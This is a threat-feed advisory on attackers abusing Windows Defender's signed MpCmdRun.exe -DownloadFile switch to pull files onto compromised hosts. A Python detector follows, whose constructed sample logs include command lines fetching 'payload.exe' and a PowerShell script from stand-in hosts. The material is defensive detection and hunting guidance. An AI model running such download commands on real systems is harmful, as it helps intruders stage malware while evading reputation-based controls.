{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/tags/mpcmdrun/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Windows Defender"],"_cs_severities":["medium"],"_cs_tags":["command-and-control","ingress-tool-transfer","windows","mpcmdrun"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eAttackers are leveraging the built-in Windows Defender command-line utility, \u003ccode\u003eMpCmdRun.exe\u003c/code\u003e, to download files from remote locations. The binary is Microsoft-signed and present on every supported Windows installation (under \u003ccode\u003eC:\\Program Files\\Windows Defender\\\u003c/code\u003e and in the versioned platform directory under \u003ccode\u003eC:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\u003c/code\u003e), so downloads it performs pass controls that only block unsigned or unfamiliar downloaders and blend in with legitimate system activity. \u003ccode\u003eMpCmdRun.exe\u003c/code\u003e is normally used to manage Windows Defender from the command line, for example to run signature updates and scans. Its \u003ccode\u003e-DownloadFile\u003c/code\u003e parameter, however, fetches an arbitrary file from the URL given with \u003ccode\u003e-url\u003c/code\u003e and writes it to the location given with \u003ccode\u003e-path\u003c/code\u003e. This abuse was first publicly reported around September 2020 and corresponds to MITRE ATT\u0026CK T1105 (Ingress Tool Transfer). Defenders should monitor for \u003ccode\u003eMpCmdRun.exe\u003c/code\u003e process creations whose command line contains \u003ccode\u003e-DownloadFile\u003c/code\u003e, particularly where the URL points at a host outside Microsoft's infrastructure.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a target system through an unrelated vulnerability or an existing compromise.\u003c/li\u003e\n\u003cli\u003eThe attacker runs \u003ccode\u003eMpCmdRun.exe -DownloadFile -url \u0026lt;URL\u0026gt; -path \u0026lt;local path\u0026gt;\u003c/code\u003e to fetch a file from a server they control; the \u003ccode\u003e-url\u003c/code\u003e argument specifies the download source and \u003ccode\u003e-path\u003c/code\u003e the destination on disk.\u003c/li\u003e\n\u003cli\u003eThe downloaded file is written to the chosen location on the compromised system.\u003c/li\u003e\n\u003cli\u003eThe attacker executes the downloaded file, which may be a malicious executable, a script, or a configuration file for tooling already on the host.\u003c/li\u003e\n\u003cli\u003eThe executed file performs further malicious actions, such as establishing persistence, escalating privileges, or deploying additional payloads.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the compromised system as a foothold to move laterally, compromising other systems and resources on the network.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their ultimate objective, such as data exfiltration, ransomware deployment, or disruption of services.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful abuse lets an attacker who already has code execution bring arbitrary tooling onto the host, which can lead to data theft, deeper system compromise, and disruption of operations. Each case is confined to hosts the attacker already controls, but the utility is present on every Windows installation, so the technique applies to any compromised organization and widespread use could cause significant financial and reputational damage. Because the download is performed by a trusted, signed Microsoft binary, it evades controls that rely on the reputation of the downloading process; detection therefore depends on command-line telemetry rather than on the identity of the executable.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eMpCmdRun Remote File Download\u003c/code\u003e to your SIEM to detect \u003ccode\u003eMpCmdRun.exe\u003c/code\u003e being used to download files.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process creation logging (Event ID 1) with command-line arguments, or Windows process creation auditing (Event ID 4688) with command-line logging; the Sigma rule needs the full command line to match.\u003c/li\u003e\n\u003cli\u003eReview historical process execution logs for instances of \u003ccode\u003eMpCmdRun.exe\u003c/code\u003e run with the \u003ccode\u003e-DownloadFile\u003c/code\u003e parameter, and match on the binary's original file name as well as its path, since a renamed copy behaves the same way.\u003c/li\u003e\n\u003cli\u003eImplement application control policies (for example WDAC or AppLocker) that block execution of unsigned or untrusted executables, so a file fetched with \u003ccode\u003eMpCmdRun.exe\u003c/code\u003e cannot simply be run from its download location.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T10:00:00Z","date_published":"2024-01-03T10:00:00Z","id":"/briefs/2024-01-03-mpcmdrun-remote-file-copy/","summary":"Attackers are abusing the Windows Defender MpCmdRun.exe utility to download remote files, potentially delivering malware or offensive tools into compromised systems.","title":"MpCmdRun.exe Used for Remote File Download","url":"https://feed.craftedsignal.io/briefs/2024-01-03-mpcmdrun-remote-file-copy/"}],"language":"en","title":"CraftedSignal Threat Feed — Mpcmdrun","version":"https://jsonfeed.org/version/1.1"}
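The detection logic the Recommendation section calls for, written out as an added example that is not part of the original feed item and is not the referenced Sigma rule. It runs over constructed Sysmon-style process creation records embedded in the block (Image, OriginalFileName, CommandLine, ParentImage), matches on the PE original file name as well as the on-disk name so a renamed copy is still caught, and pulls the `-url` and `-path` values out of the command line for triage. The allowlist of Microsoft hostnames used to lower severity is an assumption for illustration, not a statement about how Defender itself uses the switch; the `/`-prefixed switch form is matched defensively and is likewise an assumption.

```python
"""Flag MpCmdRun.exe -DownloadFile abuse in process-creation telemetry.

Added example. The records in SAMPLE_EVENTS are CONSTRUCTED to resemble
Sysmon Event ID 1 fields; they are not real logs.
"""
import re
from urllib.parse import urlparse

# ASSUMPTION for triage only: downloads from these suffixes are ranked lower,
# not ignored. This is not a claim that Defender uses -DownloadFile itself.
TRIAGE_ALLOWLIST_SUFFIXES = (".microsoft.com", ".windowsupdate.com")

# -DownloadFile is the documented switch. The '/' prefix is matched
# defensively (assumption), and matching is case-insensitive.
DOWNLOAD_SWITCH = re.compile(r"(?<!\S)[-/]downloadfile(?!\S)", re.IGNORECASE)
# Value following -url / -path, either "quoted with spaces" or a bare token.
ARG_VALUE = re.compile(r'(?<!\S)[-/](url|path)\s+(?:"([^"]*)"|(\S+))', re.IGNORECASE)


def _basename(path):
    """Lower-cased final path component, tolerant of either separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_args(cmdline):
    """Return {'url': ..., 'path': ...} for whichever of the two are present."""
    out = {}
    for m in ARG_VALUE.finditer(cmdline):
        out[m.group(1).lower()] = m.group(2) if m.group(2) is not None else m.group(3)
    return out


def is_mpcmdrun(record):
    """True if the on-disk name OR the PE OriginalFileName is MpCmdRun.exe,
    so renaming the binary does not defeat the check."""
    return (_basename(record.get("Image", "")) == "mpcmdrun.exe"
            or record.get("OriginalFileName", "").lower() == "mpcmdrun.exe")


def classify(record):
    """Return a finding dict for a suspicious record, or None if benign."""
    if not is_mpcmdrun(record):
        return None
    cmd = record.get("CommandLine", "")
    if not DOWNLOAD_SWITCH.search(cmd):
        return None  # ordinary -Scan / -SignatureUpdate usage
    args = parse_args(cmd)
    url = args.get("url", "")
    host = (urlparse(url).hostname or "").lower()
    renamed = _basename(record.get("Image", "")) != "mpcmdrun.exe"
    allowlisted = any(host.endswith(s) for s in TRIAGE_ALLOWLIST_SUFFIXES)
    if renamed:
        severity = "critical"  # a renamed copy has no legitimate use
    elif allowlisted:
        severity = "medium"
    else:
        severity = "high"
    return {
        "image": record.get("Image", ""),
        "parent": record.get("ParentImage", ""),
        "url": url,
        "host": host,
        "path": args.get("path", ""),
        "renamed_binary": renamed,
        "severity": severity,
    }


def scan(records):
    """Apply classify() to every record and keep the findings."""
    return [f for f in (classify(r) for r in records) if f]


# Constructed sample telemetry (documentation IP range / example.net hosts).
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\Windows Defender\MpCmdRun.exe",
     "OriginalFileName": "MpCmdRun.exe",
     "CommandLine": r'"C:\Program Files\Windows Defender\MpCmdRun.exe" -Scan -ScanType 2',
     "ParentImage": r"C:\Windows\System32\svchost.exe"},
    {"Image": r"C:\Program Files\Windows Defender\MpCmdRun.exe",
     "OriginalFileName": "MpCmdRun.exe",
     "CommandLine": r"MpCmdRun.exe -DownloadFile -url https://203.0.113.5/payload.exe -path C:\Users\Public\payload.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Users\bob\AppData\Local\Temp\svc.exe",
     "OriginalFileName": "MpCmdRun.exe",
     "CommandLine": r'svc.exe -downloadfile -url "http://example.net/a b.ps1" -path "C:\Users\bob\AppData\Local\Temp\a.ps1"',
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "OriginalFileName": "PowerShell.EXE",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Date",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Program Files\Windows Defender\MpCmdRun.exe",
     "OriginalFileName": "MpCmdRun.exe",
     "CommandLine": r'"C:\Program Files\Windows Defender\MpCmdRun.exe" -DownloadFile -url https://download.microsoft.com/constructed/example.cab -path C:\Windows\Temp\example.cab',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"[{finding['severity']}] {finding['image']} <- {finding['url']} -> {finding['path']}")
```

Hunting over historical data is the same loop with real records in place of `SAMPLE_EVENTS`; the field names follow Sysmon Event ID 1, and for Security 4688 events only the command line and image path are available, so the renamed-binary check needs a file-hash or signature lookup instead of `OriginalFileName`.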